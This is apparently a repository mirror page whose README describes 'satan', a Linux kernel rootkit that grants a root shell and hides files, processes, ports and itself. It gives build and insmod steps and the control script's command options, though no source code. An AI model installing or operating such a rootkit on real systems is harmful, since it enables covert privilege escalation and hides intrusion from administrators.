# satan
**Repository Path**: wedojava/satan
## Basic Information
- **Project Name**: satan
- **Description**: https://github.com/aesophor/satan
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No
## Statistics
- **Stars**: 0
- **Forks**: 0
- **Created**: 2024-02-29
- **Last Updated**: 2024-08-22
## Categories & Tags
**Categories**: Uncategorized
**Tags**: None
## README
CAUTION: Do NOT test this on physical machines!
## Overview
* Local privilege escalation (grant root shell)
* File/directory hiding **by absolute path**
* Process hiding by PID
* Port hiding
* Hide the rootkit itself
* ...
## Tested On
* Debian 9 stretch 4.9.0-11
## Build Requirements
* gcc
* GNU Make
* Linux headers
## Installation
1. Build kernel module.
```
$ git clone https://github.com/aesophor/satanic-rootkit.git
$ cd satanic-rootkit
$ make
```
2. Insert kernel module as root.
```
root# insmod satan.ko
```
3. Run satanist.py as normal user to command the rootkit.
```
$ ./satanist.py --help
```
## Usage
After inserting `satan.ko` into Linux kernel, one can use `satanist.py` to command the rootkit.
```
> ./satanist.py --help
usage: ./satanist.py [argument]
--privesc -- Spawn a root shell (bash).
--file-hide -- File/directory hiding by absolute path.
--file-unhide -- File/directory unhiding by absolute path.
--proc-hide -- Process hiding by PID.
--proc-unhide -- Process unhiding by PID.
--port-hide -- Port hiding by port number.
--port-unhide -- Port unhiding by port number.
--mod-hide -- Module hiding (hide itself from lsmod).
--mod-unhide -- Module unhiding (unhide itself from lsmod).
-h --help -- Help message.
-v --version -- Version info.
```
## License
Available under [GPL-2.0 License](https://github.com/aesophor/satanic-rootkit/blob/master/LICENSE)